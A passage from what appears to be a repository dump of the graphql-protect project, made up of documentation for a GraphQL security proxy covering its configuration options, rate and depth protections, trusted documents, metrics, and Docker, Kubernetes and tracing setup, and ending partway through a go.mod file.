spec](https://spec.graphql.org/October2021/) and [select portions of the Draft](https://spec.graphql.org/draft/). gqlparser uses [graphql-js](https://github.com/graphql/graphql-js) as a reference implementation, resulting in a similar level of graphql spec support. 47 | 48 | If you experience any issues related to spec support, or you want to verify the (draft spec) feature you want to use is supported, it's best to inspect the gqlparser library directly for your use case. 
49 | 50 | ### Response encoding 51 | 52 | Currently, handling encoded responses from the upstream is not supported, we're open for contributions : ) 53 | -------------------------------------------------------------------------------- /docs/assets/banner.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/supportivefe/graphql-protect/943ff0979a470b48b70dc3e27943061d6cdb520a/docs/assets/banner.jpeg -------------------------------------------------------------------------------- /docs/configuration.md: -------------------------------------------------------------------------------- 1 | # Configuration 2 | 3 | `graphql-protect` can be configured via a `protect.yml`. file 4 | 5 | 6 | 7 | # protect.yml 8 | 9 | The default location to configure `graphql-protect` is by specifying a `protect.yml` in the same directory as you're running the binary. 10 | 11 | The following outlines the structure of the yaml, as well as outlines the **defaults** for each configuration option. 12 | 13 | ```yaml 14 | web: 15 | # Maximum duration to read the entire request 16 | read_timeout: 5s 17 | # Maximum duration before timing out writes of the response 18 | write_timeout: 10s 19 | # Maximum time to wait between idle requests for keep alive 20 | idle_timeout: 120s 21 | # Time to wait until forcibly shutting down protect, after receiving a shutdown signal 22 | shutdown_timeout: 20s 23 | # host and port to listen on 24 | host: 0.0.0.0:8080 25 | # path that receives GraphQL traffic 26 | path: /graphql 27 | # limit the maximum size of a request body that is allowed 28 | # this helps prevent OOM attacks through excessively large request payloads. 29 | # A limit of `0` disables this protection. 
30 | request_body_max_bytes: 102400 31 | 32 | target: 33 | # Target host and port to send traffic to after validating 34 | host: http://localhost:8081 35 | # Dial timeout waiting for a connection to complete with the target upstream 36 | timeout: 10s 37 | # Interval of keep alive probes 38 | keep_alive: 180s 39 | tracing: 40 | # Headers to redact when sending tracing information 41 | redacted_headers: [] 42 | 43 | schema: 44 | # Path to a local file in which the schema can be found 45 | path: "./schema.graphql" 46 | # Automatically reload the schema file. 47 | # It will reload the contents of the file referenced by the `schema.path` configuration option 48 | # after each `schema.auto_reload.interval` has passed. 49 | auto_reload: 50 | # Enable automatic file reloading 51 | enabled: true 52 | # The interval in which the schema file should be reloaded 53 | interval: 5m 54 | 55 | # Configures whether we obfuscate graphql-protect validation errors such as max_aliases/max_tokens 56 | # Recommended to set it to 'true' for public environments 57 | obfuscate_validation_errors: false 58 | 59 | # Configures if upstream errors need to be obfuscated, this can help you hide internals of your upstream landscape 60 | obfuscate_upstream_errors: true 61 | 62 | persisted_operations: 63 | # Enable or disable the feature, disabled by default 64 | enabled: false 65 | # configures a '/internal/debug_trusted_documents' endpoint to print the persisted operations as json 66 | # Make sure you DONT expose this endpoint publicly if you enable this feature! 
67 | enable_debug_endpoint: false 68 | # Fail unknown operations, disable this feature to allow unknown operations to reach your GraphQL API 69 | reject_on_failure: true 70 | # Loader decides how persisted operations are loaded, see loader chapter for more details 71 | loader: 72 | # Type of loader to use 73 | type: local 74 | # Location to load persisted operations from 75 | location: ./store 76 | # Whether to reload persisted operations periodically 77 | reload: 78 | enabled: true 79 | # The interval in which the persisted operations are refreshed 80 | interval: 5m0s 81 | # The timeout for the refreshing operation 82 | timeout: 10s 83 | 84 | block_field_suggestions: 85 | enabled: true 86 | mask: "[redacted]" 87 | 88 | max_aliases: 89 | # Enable the feature 90 | enabled: true 91 | # The maximum number of allowed aliases within a single request. 92 | max: 15 93 | # Reject the request when the rule fails. Disable this to allow the request 94 | reject_on_failure: true 95 | 96 | max_depth: 97 | # protects against operations being too deep 98 | field: 99 | enabled: true 100 | # The maximum allowed depth within a single request. 101 | max: 15 102 | # Reject the request when the rule fails. Disable this to allow the request 103 | reject_on_failure: true 104 | # protects against lists being nested too many times 105 | list: 106 | enabled: true 107 | # The maximum allowed depth within a single request. 108 | max: 15 109 | # Reject the request when the rule fails. Disable this to allow the request 110 | reject_on_failure: true 111 | 112 | max_tokens: 113 | # Enable the feature 114 | enabled: true 115 | # The maximum number of allowed tokens within a single request. 116 | max: 10000 117 | # Reject the request when the rule fails. Disable this to allow the request regardless of token count. 118 | reject_on_failure: true 119 | 120 | max_batch: 121 | # Enable the feature 122 | enabled: true 123 | # The maximum number of operations within a single batched request. 
124 | max: 5 125 | # Reject the request when the rule fails. Disable this to allow the request regardless of token count. 126 | reject_on_failure: true 127 | 128 | enforce_post: 129 | # Enable enforcing POST http method 130 | enabled: true 131 | 132 | # Enable or disable logging of graphql errors 133 | log_graphql_errors: false 134 | 135 | log: 136 | # text, or json for structured logging 137 | format: text 138 | ``` 139 | 140 | For a more in-depth view of each option visit the accompanying documentation page of each individual protection. 141 | 142 | ## Graphql protect - validate run mode 143 | While the validate run mode works with the same config as the normal mode, for simplicity's sake you can leave out quite some unused options. 144 | As an example checkout the config below: 145 | 146 | ```yaml 147 | schema: 148 | # Path to a local file in which the schema can be found 149 | path: "./schema.graphql" 150 | 151 | persisted_operations: 152 | enabled: true 153 | # Store is the location on local disk where graphql-protect can find the persisted operations, it loads any `*.json` files on disk 154 | loader: 155 | # Type of loader to use 156 | type: local 157 | # Location to load persisted operations from 158 | location: ./store 159 | 160 | max_aliases: 161 | # Enable the feature 162 | enabled: true 163 | # The maximum number of allowed aliases within a single request. 164 | max: 15 165 | 166 | block_field_suggestions: 167 | enabled: true 168 | mask: "[redacted]" 169 | 170 | max_depth: 171 | enabled: true 172 | # The maximum allowed depth within a single request. 173 | max: 15 174 | 175 | max_tokens: 176 | # Enable the feature 177 | enabled: true 178 | # The maximum number of allowed tokens within a single request. 179 | max: 10000 180 | 181 | max_batch: 182 | # Enable the feature 183 | enabled: true 184 | # The maximum number of operations within a single batched request. 
185 | max: 5 186 | ``` -------------------------------------------------------------------------------- /docs/http.md: -------------------------------------------------------------------------------- 1 | # HTTP Configuration 2 | 3 | ## HTTP server configuration 4 | 5 | ```yaml 6 | web: 7 | # Maximum duration to read the entire request 8 | read_timeout: 5s 9 | # Maximum duration before timing out writes of the response 10 | write_timeout: 10s 11 | # Maximum time to wait between idle requests for keep alive 12 | idle_timeout: 120s 13 | # Time to wait until forcibly shutting down protect, after receiving a shutdown signal 14 | shutdown_timeout: 20s 15 | # host and port to listen on 16 | host: 0.0.0.0:8080 17 | # path that receives GraphQL traffic 18 | path: /graphql 19 | # limit the maximum size of a request body that is allowed 20 | # this helps prevent OOM attacks through excessively large request payloads. 21 | # A limit of `0` disables this protection. 22 | request_body_max_bytes: 102400 23 | 24 | target: 25 | # Target host and port to send traffic to after validating 26 | host: http://localhost:8081 27 | # Dial timeout waiting for a connection to complete with the target upstream 28 | timeout: 10s 29 | # Interval of keep alive probes 30 | keep_alive: 180s 31 | tracing: 32 | # Headers to redact when sending tracing information 33 | redacted_headers: [] 34 | ``` 35 | 36 | ## HTTP Request Body Max Byte size 37 | 38 | To prevent OOM attacks through excessively large request bodies, a default limit is posed on request body size of `100kb`. This limit is generally speaking ample space for GraphQL request bodies, while also providing solid protections. 39 | 40 | You can modify this limit by changing the following configuration option 41 | 42 | ```yaml 43 | web: 44 | # limit the maximum size of a request body that is allowed 45 | # this helps prevent OOM attacks through excessively large request payloads. 46 | # A limit of `0` disables this protection. 
47 | request_body_max_bytes: 102400 48 | ``` 49 | 50 | ### Metrics 51 | 52 | A metric is exposed to track if and when a request is rejected that exceeds this limit. 53 | 54 | ``` 55 | graphql_protect_http_request_max_body_bytes_exceeded_count{} 56 | ``` 57 | 58 | No metrics are produced for requests that do not exceed this limit. -------------------------------------------------------------------------------- /docs/protections/access_logging.md: -------------------------------------------------------------------------------- 1 | # Access Logging 2 | 3 | In some cases you want to keep a record of what operations were performed against your landscape. The access logging protection can provide that for you. 4 | Access logging is done to STDOUT. 5 | 6 | 7 | 8 | ## Configuration 9 | 10 | You can configure `graphql-protect` to enable access logging for incoming operations. 11 | 12 | ```yaml 13 | access_logging: 14 | # Enable the feature 15 | enabled: true 16 | include_headers: 17 | # Include any headers of interest here 18 | - Authorization 19 | # Include the operation name in the access log record 20 | include_operation_name: true 21 | # Include the variables in the access log record 22 | include_variables: true 23 | # Include the payload in the access log record 24 | include_payload: true 25 | ``` 26 | 27 | ## How does it work? 28 | 29 | For each operation we'll produce an access log record according to your provided configuration. 30 | 31 | If used in conjunction with persisted operations the access log will be produced after the operation is swapped for the payload, meaning you have full access to the operation name and payload. -------------------------------------------------------------------------------- /docs/protections/block_field_suggestions.md: -------------------------------------------------------------------------------- 1 | # Field Suggestions 2 | 3 | Field suggestions in a GraphQL server, though convenient, can pose risks. 
They can reveal internal details, like field or operation names, potentially aiding malicious actors. 4 | 5 | Disabling field suggestions prevents the discovery of your GraphQL schema even when Introspection is disabled. 6 | 7 | 8 | 9 | ## Configuration 10 | 11 | You can configure `graphql-protect` to remove field suggestions from your API. 12 | 13 | ```yaml 14 | block_field_suggestions: 15 | # Enable the feature, this will remove any field suggestions on your API 16 | enabled: true 17 | # The mask to apply whenever a field suggestion is found. The entire message will be replaced with this string 18 | mask: "[redacted]" 19 | ``` 20 | 21 | ## How does it work? 22 | 23 | We scan each `errors[].message` field in the responses and replace the message with a mask when we encounter a field suggestion. 24 | 25 | ## Metrics 26 | 27 | This rule produces metrics to help you gain insights into the behavior of the rule. 28 | 29 | ``` 30 | graphql_protect_block_field_suggestions_results{result} 31 | ``` 32 | 33 | | `result` | Description | 34 | |----------|---------------------------------------------------------------------| 35 | | `masked` | The rule found suggestions and masked the error message | 36 | | `unmasked` | The rule found no suggestions and did not alter the response | 37 | 38 | 39 | No metrics are produced when the rule is disabled. -------------------------------------------------------------------------------- /docs/protections/enforce_post.md: -------------------------------------------------------------------------------- 1 | # Enforce POST 2 | 3 | A rule that enforces the use of the HTTP POST method when sending operations to the upstream GraphQL API. 4 | 5 | The rule will block requests with non-POST HTTP methods **only** if the requests contain GraphQL operations. If no operation is found it will still forward the request to the upstream. This is useful for accessing GraphiQL for example through GraphQL Protect. 
6 | 7 | 8 | 9 | 10 | ## Configuration 11 | 12 | ```yaml 13 | enforce_post: 14 | # Enable the feature 15 | enable: true 16 | ``` 17 | 18 | ## Metrics 19 | 20 | This rule produces metrics to help you gain insights into the behavior of the rule. 21 | 22 | ``` 23 | graphql_protect_enforce_post_count{} 24 | ``` 25 | 26 | No metrics are produced when the rule is disabled or never encounters operations through a non-POST request. -------------------------------------------------------------------------------- /docs/protections/max_aliases.md: -------------------------------------------------------------------------------- 1 | # Max Aliases 2 | 3 | Restricting the maximum number of aliases that are allowed within a single operation protects your API from Brute Force attacks. 4 | 5 | Aliases allow you to perform the same operation multiple times, within a single request. This opens up the possibility of for example trying out login operations 1000 times with 1 request. 6 | Or even worse, uploading a 1 MB image with 1000 aliases in 1 request using the same binary data, essentially creating a Denial of Service attack on your API with 1MB of data, resulting in 1GB of data processed on the server. 7 | 8 | 9 | 10 | ## Configuration 11 | 12 | You can configure `graphql-protect` to limit the maximum number of aliases allowed on an operation. 13 | 14 | ```yaml 15 | max_aliases: 16 | # Enable the feature 17 | enable: true 18 | # The maximum number of allowed aliases within a single request. 19 | max: 15 20 | # Reject the request when the rule fails. Disable this to allow the request 21 | reject_on_failure: true 22 | ``` 23 | 24 | ## Metrics 25 | 26 | This rule produces metrics to help you gain insights into the behavior of the rule. 
27 | 28 | ``` 29 | graphql_protect_max_aliases_results{result} 30 | ``` 31 | 32 | 33 | | `result` | Description | 34 | |---------|--------------------------------------------------------------------------------------------------------------| 35 | | `allowed` | The rule condition succeeded | 36 | | `rejected` | The rule condition failed and the request was rejected | 37 | | `failed` | The rule condition failed but the request was not rejected. This happens when `reject_on_failure` is `false` | 38 | 39 | No metrics are produced when the rule is disabled. -------------------------------------------------------------------------------- /docs/protections/max_batch.md: -------------------------------------------------------------------------------- 1 | # Max Batch 2 | 3 | Restricts the maximum number of operations inside a batched request. This helps prevent an excessive number of operations reaching your landscape through minimal requests. 4 | This can be useful to prevent DDoS attacks, Heap Overflows or Server overload. 5 | 6 | 7 | 8 | ## Configuration 9 | 10 | You can configure `graphql-protect` to limit the maximum number of operations allowed inside a batch request. 11 | 12 | ```yaml 13 | max_batch: 14 | # Enable the feature 15 | enable: true 16 | # The maximum number of operations within a single batched request. 17 | max: 5 18 | # Reject the request when the rule fails. Disable this to allow the request regardless of token count. 19 | reject_on_failure: true 20 | ``` 21 | 22 | ## Metrics 23 | 24 | This rule produces metrics to help you gain insights into the behavior of the rule. 
25 | 26 | ``` 27 | graphql_protect_max_batch_results{result, size} 28 | ``` 29 | | `size` | Description | 30 | |-------------|-------------------------------------------------------------------------------------------------------------------------------------------| 31 | | `{integer}` | The actual integer value of the observed size, only if the operations was allowed by the rule | 32 | | `exceeded` | Whenever the operation was rejected or failed, `exceeded` is tracked. This is to prevent excessive metric generation upon malicious input | 33 | 34 | | `result` | Description | 35 | |---------|--------------------------------------------------------------------------------------------------------------| 36 | | `allowed` | The rule condition succeeded | 37 | | `rejected` | The rule condition failed and the request was rejected | 38 | | `failed` | The rule condition failed but the request was not rejected. This happens when `reject_on_failure` is `false` | 39 | 40 | No metrics are produced when the rule is disabled. -------------------------------------------------------------------------------- /docs/protections/max_depth.md: -------------------------------------------------------------------------------- 1 | # Max depth 2 | 3 | Max depth protections provide mechanisms for limiting the maximum field and nested lists. 4 | Field depth restricts the depth of fields. 5 | List depth restricts the amount of times lists can be nested. 6 | 7 | Restricting the maximum depth of operations protect your API from abuse. 8 | 9 | 10 | 11 | ## Configuration 12 | 13 | You can configure `graphql-protect` to limit the maximum depth on an operation. 14 | 15 | ```yaml 16 | max_depth: 17 | # [deprecated, see field object] Enable the feature 18 | enable: true 19 | # [deprecated, see field object] The maximum depth allowed within a single request. 20 | max: 15 21 | # [deprecated, see field object] Reject the request when the rule fails. 
Disable this to allow the request 22 | reject_on_failure: true 23 | # maximum field depth protections 24 | field: 25 | # Enable the protection 26 | enabled: false 27 | # The maximum depth allowed within a single document 28 | max: 1 29 | # Reject the document when the rule fails. Disable this to allow the document to be passed on to your API. 30 | reject_on_failure: false 31 | # maximum list depth protection, limits the depth of nested lists 32 | list: 33 | # Enable the protection 34 | enabled: false 35 | # The maximum depth allowed within a single document. 36 | max: 1 37 | # Reject the document when the rule fails. Disable this to allow the document to be passed on to your API. 38 | reject_on_failure: false 39 | ``` 40 | 41 | ## Field protection 42 | 43 | Ensures operations aren't too deep. Limiting this prevents excessive resolver calling, and waterfall processing tying up resources on your server. 44 | 45 | The below field is an example operation that shows the depth of each field in the operation. 46 | ```graphql 47 | { 48 | user { (1) 49 | address { (2) 50 | country { (3) 51 | contintent { (4) 52 | planet { (5) 53 | system { (6) 54 | name (7) 55 | } 56 | } 57 | } 58 | } 59 | } 60 | pet { (2) 61 | name (3) 62 | } 63 | } 64 | } 65 | ``` 66 | 67 | ## List protection 68 | 69 | Checks that lists aren't being nested too many times, leading to potential response amplification attacks 70 | Ensures lists inside your operations aren't being nested too many times. Limiting this prevents potential response amplification attacks. 71 | 72 | The below field is an example operation that shows the depth of each list in the operation. 
73 | 74 | ```graphql 75 | { 76 | user { 77 | friends { (1) 78 | friends { (2) 79 | friends { (3) 80 | friends { (4) 81 | friends { (5) 82 | name 83 | } 84 | } 85 | } 86 | } 87 | } 88 | } 89 | } 90 | ``` 91 | 92 | Assuming each person has 100 friends, the above operation would yield `100 * 100 * 100 * 100 * 100` = `10.000.000.000` resources to be fetched. 93 | 94 | ## Metrics 95 | 96 | This rule produces metrics to help you gain insights into the behavior of the rule. 97 | 98 | ``` 99 | graphql_protect_max_depth_results{type, result} 100 | ``` 101 | 102 | | `type` | Description | 103 | |----------|--------------------------------------------------------------------------------------------------------------| 104 | | `field` | Field depth protection rule | 105 | | `list` | List depth protection rule | 106 | 107 | | `result` | Description | 108 | |---------|--------------------------------------------------------------------------------------------------------------| 109 | | `allowed` | The rule condition succeeded | 110 | | `rejected` | The rule condition failed and the request was rejected | 111 | | `failed` | The rule condition failed but the request was not rejected. This happens when `reject_on_failure` is `false` | 112 | 113 | No metrics are produced when the rule is disabled. -------------------------------------------------------------------------------- /docs/protections/max_tokens.md: -------------------------------------------------------------------------------- 1 | # Max Tokens 2 | 3 | Restricting the maximum number of tokens in an operation helps prevent excessively large operations reaching your landscape. 4 | This can be useful to prevent DDoS attacks, Heap Overflows or Server overload. 5 | 6 | 7 | 8 | ## Configuration 9 | 10 | You can configure `graphql-protect` to limit the maximum number of tokens allowed on an operation. 
11 | 12 | ```yaml 13 | max_tokens: 14 | # Enable the feature 15 | enable: true 16 | # The maximum number of allowed tokens within a single request. 17 | max: 1000 18 | # Reject the request when the rule fails. Disable this to allow the request regardless of token count. 19 | reject_on_failure: true 20 | ``` 21 | 22 | ## Metrics 23 | 24 | This rule produces metrics to help you gain insights into the behavior of the rule. 25 | 26 | ``` 27 | graphql_protect_max_tokens_results{result} 28 | ``` 29 | 30 | 31 | | `result` | Description | 32 | |---------|--------------------------------------------------------------------------------------------------------------| 33 | | `allowed` | The rule condition succeeded | 34 | | `rejected` | The rule condition failed and the request was rejected | 35 | | `failed` | The rule condition failed but the request was not rejected. This happens when `reject_on_failure` is `false` | 36 | 37 | No metrics are produced when the rule is disabled. -------------------------------------------------------------------------------- /docs/protections/obfuscate_upstream_errors.md: -------------------------------------------------------------------------------- 1 | # Obfuscate upstream errors 2 | 3 | Upstream errors in a GraphQL server, though convenient, can pose risks. They can reveal internal details about the upstream server(s), potentially aiding malicious actors. 4 | 5 | 6 | ## Configuration 7 | 8 | You can configure `graphql-protect` to exclude upstream errors from your API. 9 | 10 | ```yaml 11 | # Configures if upstream errors need to be obfuscated, this can help you hide internals of your upstream landscape 12 | 13 | obfuscate_upstream_errors: true # default 14 | ``` 15 | 16 | ## How does it work? 
17 | 18 | If enabled, the `errors[].message` field in the response is replaced with an `"Error(s) redacted"` message. 19 | -------------------------------------------------------------------------------- /docs/protections/schema.md: -------------------------------------------------------------------------------- 1 | # Schema 2 | 3 | `graphql-protect` needs to know your schema in order to perform its validations. 4 | 5 | 6 | 7 | ## Configuration 8 | 9 | ```yaml 10 | # ... 11 | 12 | schema: 13 | # Path to a local file in which the schema can be found 14 | path: "./schema.graphql" 15 | # Automatically reload the schema file. 16 | # It will reload the contents of the file referenced by the `schema.path` configuration option 17 | # after each `schema.auto_reload.interval` has passed. 18 | auto_reload: 19 | # Enable automatic file reloading 20 | enabled: true 21 | # The interval in which the schema file should be reloaded 22 | interval: 5m 23 | ``` 24 | 25 | ## Metrics 26 | 27 | ``` 28 | graphql_protect_schema_reload{state} 29 | ``` 30 | 31 | | `state` | Description | 32 | |-----------|-------------------------------------------------------------| 33 | | `failed` | Reloading the file from local disk has failed | 34 | | `success` | The schema file was successfully reloaded from local disk | 35 | -------------------------------------------------------------------------------- /docs/protections/trusted_documents.md: -------------------------------------------------------------------------------- 1 | # Trusted Documents (Persisted Operations) 2 | 3 | Persisted Operations are essentially an operation allowlist. Persisted Operations provide an additional layer of security to your GraphQL API by disallowing arbitrary queries to be performed against your APIs. 4 | 5 | We recommend that all GraphQL APIs that only intend a specific/known set of clients to use the API should use Persisted Operations. 6 | 7 | ## Why do I most likely need this? 
8 | 9 | To best explain why you most likely should be using Trusted Documents, please check out the following resources: 10 | * https://benjie.dev/graphql/trusted-documents 11 | 12 | ## What is the difference between Trusted Documents and Persisted Operations? 13 | 14 | They are the same thing. The intention is to compose a set of operations you expect to happen, typically during the build time of your clients, and load these onto your server. You allow only these operations to be executed through the exchange of the ID (or hash) of these operations. 15 | 16 | Trusted Documents conveys that these operations are trusted. 17 | 18 | We use Trusted Documents and Persisted Operations interchangeably in this documentation. 19 | 20 | 21 | 22 | ## Configuration 23 | 24 | You can configure `graphql-protect` to enable Persisted Operations. 25 | 26 | ```yaml 27 | # ... 28 | # Trusted documents uses the same configuration as persisted operations, as they are the same thing. 29 | persisted_operations: 30 | # Enable or disable the feature, disabled by default 31 | enabled: false 32 | # configures a '/internal/debug_trusted_documents' endpoint to print the persisted operations as json 33 | # Make sure you don't expose this endpoint publicly if you enable this feature! 34 | enable_debug_endpoint: false 35 | # Fail unknown operations, disable this feature to allow unknown operations to reach your GraphQL API 36 | reject_on_failure: true 37 | # Loader decides how persisted operations are loaded, see loader chapter for more details 38 | loader: 39 | # Type of loader to use 40 | type: local 41 | # Location to load persisted operations from 42 | location: ./store 43 | # Whether to reload persisted operations periodically 44 | reload: 45 | enabled: true 46 | # The interval in which the persisted operations are refreshed 47 | interval: 5m0s 48 | # The timeout for the refreshing operation 49 | timeout: 10s 50 | 51 | # ... 
52 | ``` 53 | 54 | ## How it works 55 | 56 | `graphql-protect` looks at the location specified for the `loader` and looks for any `*.json` files it can parse for persisted operations. 57 | These loaders can be specified to look at local directories, or remote locations like GCP buckets. 58 | `graphql-protect` will load the persisted operations from the location and update its internal state with any new operations. 59 | 60 | ## Loader 61 | 62 | Currently we have support for the following loaders, specified by the `type` field in the loader configuration: 63 | 64 | * `local` - load persisted operations from local file system, this is the default strategy. If need be this allows you to download files from an unsupported remote location to local storage, and have `graphql-protect` pick up on them. 65 | * `gcp` - load persisted operations from a GCP bucket 66 | * `noop` - no persisted operations are loaded. This is the strategy applied when an unknown type is supplied. 67 | 68 | ## Parsing Structure 69 | 70 | To be able to parse Persisted Operations graphql-protect expects a `key-value` structure for `hash-operation` in the files. 71 | 72 | `any-file.json` 73 | ```json 74 | { 75 | "key": "query { product(id: 1) { id name } }", 76 | "another-key": "query { hello }" 77 | } 78 | ``` 79 | 80 | Once loaded, any incoming operation with a known hash will be modified to include the operations specified as the value. 81 | 82 | ## Request Structure 83 | 84 | We follow the [APQ specification](https://github.com/apollographql/apollo-link-persisted-queries#apollo-engine) for **sending** hashes to the server. 85 | 86 | > **Important:** 87 | > While we use the specification for APQ, be aware that _automatically_ persisting unknown operations is **NOT** supported. 88 | 89 | ## Why we don't support APQ 90 | 91 | Automated Persisted Queries/Operations is essentially the same as Persisted Operations, except a client can send arbitrary operations which will be remembered by the server. 
92 | 93 | This completely removes the security benefit of Persisted Operations as any client can still send arbitrary operations. In fact, security is reduced since a malicious user could spam your endpoint with persisted operation registrations which would overflow your store and affect reliability. 94 | 95 | For this reason we do not deem APQ a good practice, and have chosen not to support it. 96 | 97 | ## Generating Persisted Operations from the Client 98 | 99 | In order to utilize this feature you need to generate the persisted operations that each client can perform. 100 | 101 | [GraphQL Code Generator](https://the-guild.dev/graphql/codegen/plugins/presets/preset-client#persisted-documents) 102 | 103 | 104 | ## Metrics 105 | 106 | This rule produces metrics to help you gain insights into the behavior of the rule. 107 | 108 | ``` 109 | graphql_protect_persisted_operations_result_count{state, result} 110 | ``` 111 | 112 | | `state` | Description | 113 | |---------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| 114 | | `unknown` | The rule was not able to do its job. This happens either when `reject_on_failure` is set to `false` or the rule was not able to deserialize the request. | 115 | | `error` | The rule caught an error during request body mutation. 
| 116 | | `known` | The rule received a hash for which it had a known operation | 117 | 118 | 119 | | `result` | Description | 120 | |---------|-------------------------------| 121 | | `allowed` | The rule allowed the request | 122 | | `rejected` | The rule rejected the request | 123 | 124 | ``` 125 | graphql_protect_persisted_operations_load_result_count{type, result} 126 | ``` 127 | 128 | 129 | | `type` | Description | 130 | |---------|-------------------------------| 131 | | `local` | Loaded using the local loader | 132 | | `gcp` | Loaded using the gcp loader | 133 | | `noop` | Loaded using the noop loader | 134 | 135 | 136 | | `result` | Description | 137 | |-----------|---------------------------| 138 | | `success` | loading was successful | 139 | | `failure` | loading produced an error | 140 | 141 | No metrics are produced when the rule is disabled. 142 | 143 | ``` 144 | graphql_protect_persisted_operations_unique_hashes_in_memory_count{} 145 | ``` 146 | 147 | No metrics are produced when the rule is disabled. 148 | -------------------------------------------------------------------------------- /docs/run/docker.md: -------------------------------------------------------------------------------- 1 | # Docker 2 | 3 | `GraphQL Protect` provides a container image for your convenience. You can use this container image as is. 4 | You may supply configuration files, port mappings and other mounts for the functionalities provided. 5 | 6 | ## Setting up 7 | 8 | #### Pull 9 | 10 | ```shell 11 | docker pull ghcr.io/ldebruijn/graphql-protect:latest 12 | ``` 13 | 14 | #### Run 15 | 16 | ```shell 17 | docker run -p 8080:8080 -v $(pwd)/protect.yml:/app/protect.yml -v $(pwd)/schema.graphql:/app/schema.graphql ghcr.io/ldebruijn/graphql-protect:latest 18 | ``` 19 | 20 | This mounts the necessary configuration and schema files from your local filesystem onto your container, and exposes port 8080 to the host machine. 
21 | 22 | ## Networking 23 | 24 | If you want to [reach a process on the host machine](https://docs.docker.com/desktop/networking/#i-want-to-connect-from-a-container-to-a-service-on-the-host), be sure to use `host.docker.internal` as the hostname for the proxy target, instead of `localhost`. 25 | 26 | If you want to reach another container, be sure the two containers are in the [same container network](https://docs.docker.com/network/) to be able to communicate with each other. -------------------------------------------------------------------------------- /docs/run/kubernetes.md: -------------------------------------------------------------------------------- 1 | # Kubernetes 2 | 3 | GraphQL Protect is intended to run as proxy to your main application. This allows it to scale with your application, and enjoys the benefit of loopback networking. 4 | 5 | ## Deployment resource 6 | 7 | This specification describes a minimal example, focussing only on the elements relevant for GraphQL Protect. 8 | 9 | > [!NOTE] 10 | > This is not a complete example, you're expected to mix this in with your existing deployment specification. 

```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: my-graphql-api
spec:
  template:
    spec:
      containers:
        - name: my-graphql-api
          # Your main app
        - name: graphql-protect
          # Pin with specific version
          image: ghcr.io/ldebruijn/graphql-protect:latest
          args:
            # Override main command, specify mounted configuration file
            - "serve"
            - "-f"
            - "./config/graphql-protect-config.yml"
          ports:
            - containerPort: 8080
          readinessProbe:
            periodSeconds: 1
            initialDelaySeconds: 3
            failureThreshold: 2
            successThreshold: 2
            httpGet:
              # Readiness probe for GraphQL Protect
              path: /internal/healthz/readiness
              port: 8080
            timeoutSeconds: 1
          env:
            - name: GOMAXPROCS
              valueFrom:
                resourceFieldRef:
                  resource: requests.cpu
          volumeMounts:
            # Mount GraphQL Protect file in container local file system
            - mountPath: /app/config
              name: graphql-protect-config
            # Mount GraphQL Schema file in container local file system
            - mountPath: /app/schema
              name: schema-config
            # Mount empty dir in container local file system
            - mountPath: /app/store
              name: persisted-operations-store
      volumes:
        # Empty dir for storing persisted operations in
        - name: persisted-operations-store
          emptyDir: { }
        # GraphQL Protect configuration file yaml
        - name: graphql-protect-config
          configMap:
            name: graphql-protect-config
        # GraphQL schema file
        - name: schema-config
          configMap:
            name: graphql-schema-config
```

## Config Map Resource

You can create configmaps with the necessary configuration by running the following command and pointing it to your configuration file.
75 | 76 | ### Protect.yml 77 | 78 | ```shell 79 | kubectl create configmap graphql-protect-config --from-file=protect.yml 80 | ``` 81 | 82 | ### schema.graphql 83 | 84 | ```shell 85 | kubectl create configmap graphql-schema-config --from-file=schema.graphql 86 | ``` 87 | 88 | > [!NOTE] 89 | > As always, make sure you're operating on the right context and namespace when executing these commands. -------------------------------------------------------------------------------- /docs/run/tracing.md: -------------------------------------------------------------------------------- 1 | # Tracing 2 | 3 | Graphql Protect supports OpenTelemetry-based tracing, enhancing observability and monitoring capabilities. 4 | Although the instrumentation is currently limited, it enables the creation of new spans that can be exported to 5 | any OTLP-compatible exporter. 6 | 7 | ## Exporting Traces 8 | 9 | Tracing data exporting relies on [autoexport](https://pkg.go.dev/go.opentelemetry.io/contrib/exporters/autoexport#NewSpanExporter). 10 | Configuration is done via environment variables `OTEL_TRACES_EXPORTER` and `OTEL_EXPORTER_OTLP_PROTOCOL`, which 11 | determine how trace data is exported. For example, setting `OTEL_EXPORTER_OTLP_PROTOCOL` to `grpc` enables gRPC protocol 12 | for exporting data. 13 | 14 | ## Header Propagation 15 | 16 | The system uses [autoprop](https://pkg.go.dev/go.opentelemetry.io/contrib/propagators/autoprop) for header propagation, 17 | configured through the `OTEL_PROPAGATORS` environment variable. Supported propagators include tracecontext, baggage, b3, 18 | and others. This configuration determines how trace context is maintained across different service calls. 19 | 20 | ## Redacting headers 21 | OpenTelemetry might collect HTTP headers that contain sensitive information or PII which are usually not desirable to be 22 | logged in the traces. 
By default, OpenTelemetry redacts the following headers: `Authorization, WWW-Authenticate, Proxy-Authenticate 23 | Proxy-Authorization, Cookie, Set-Cookie`. 24 | If desired, additional headers can be redacted in `config.yml`. 25 | ```yaml 26 | target: 27 | redacted_headers: 28 | - Some-Private-Header 29 | - Some-Other-Private-Header 30 | ``` 31 | 32 | ### Kubernetes Configuration Example 33 | 34 | Below is an example configuration for Kubernetes, replace v0.11.0 with the version of Graphql Protect you are using. 35 | 36 | ```yaml 37 | # ... 38 | spec: 39 | template: 40 | spec: 41 | containers: 42 | - name: graphql-protect 43 | image: ghcr.io/ldebruijn/graphql-protect:latest # Replace with the appropriate version 44 | env: 45 | - name: OTEL_EXPORTER_OTLP_PROTOCOL 46 | value: grpc 47 | - name: OTEL_PROPAGATORS 48 | value: b3multi,tracecontext,baggage 49 | # ... 50 | ``` 51 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/supportivefe/graphql-protect 2 | 3 | go 1.24.0 4 | 5 | require ( 6 | cloud.google.com/go/storage v1.53.0 7 | github.com/jedib0t/go-pretty/v6 v6.6.7 8 | github.com/prometheus/client_golang v1.22.0 9 | github.com/stretchr/testify v1.10.0 10 | github.com/vektah/gqlparser/v2 v2.5.27 11 | go.opentelemetry.io/contrib/exporters/autoexport v0.60.0 12 | go.opentelemetry.io/contrib/instrumentation/net/http/httptrace/otelhttptrace v0.60.0 13 | go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.60.0 14 | go.opentelemetry.io/contrib/propagators/autoprop v0.60.0 15 | go.opentelemetry.io/otel v1.35.0 16 | go.opentelemetry.io/otel/sdk v1.35.0 17 